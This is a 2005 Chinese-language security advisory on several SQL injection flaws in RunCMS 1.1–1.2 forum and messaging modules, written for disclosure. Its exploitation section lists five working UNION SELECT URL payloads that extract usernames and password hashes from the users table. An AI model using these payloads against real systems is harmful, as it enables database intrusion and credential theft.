RunCMS NewBB_Plus和消息模块多个SQL注入漏洞
2005-08-24
系统编号:
WAVDB-00636
BUGTRAQ: 14631
影响版本:
RunCMS 1.1-1.2
程序介绍:
RunCMS是一个用PHP编写的内容管理系统。
漏洞分析:
RunCMS中存在多个SQL注入漏洞,成功利用这个漏洞的攻击者可以在数据库中执行任意SQL命令。
起因是没有正确的验证用户输入
漏洞利用:
http://www.example.com/runcms/modules/newbb_plus/newtopic.php?forum=-99%20UNION%20SELECT%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,pass,1,1%20FROM%20runcms_users%20WHERE%201/
http://www.example.com/runcms/modules/newbb_plus/edit.php?forum=-99%20UNION%20SELECT%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20FROM%20runcms_users%20WHERE%201*&post_id=2'&topic_id=2&viewmode=flat&order=0
http://www.example.com/runcms/modules/newbb_plus/reply.php?forum=-99%20UNION%20SELECT%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,pass,1,1%20FROM%20runcms_users%20WHERE%201*&post_id=2&topic_id=2&viewmode=flat&order=0
http://www.example.com/runcms/modules/messages/print.php?msg_id=-99%20UNION%20SELECT%201,uname,1,1,1,pass%20FROM%20runcms_users%20WHERE%201*&op=print_pn
http://www.example.com/runcms/modules/messages/print.php?msg_id=-99%20UNION%20SELECT%201,uname,1,1,1,pass%20FROM%20runcms_users%20WHERE%201*&op=print_sent_pn
解决方案:
厂商补丁:
RunCMS
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.runcms.org/public/modules/news/
信息来源:
<*来源:James Bercegay (security@gulftech.org)
NT (NT@IHSTeam.com)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=112439215217671&w=2
*>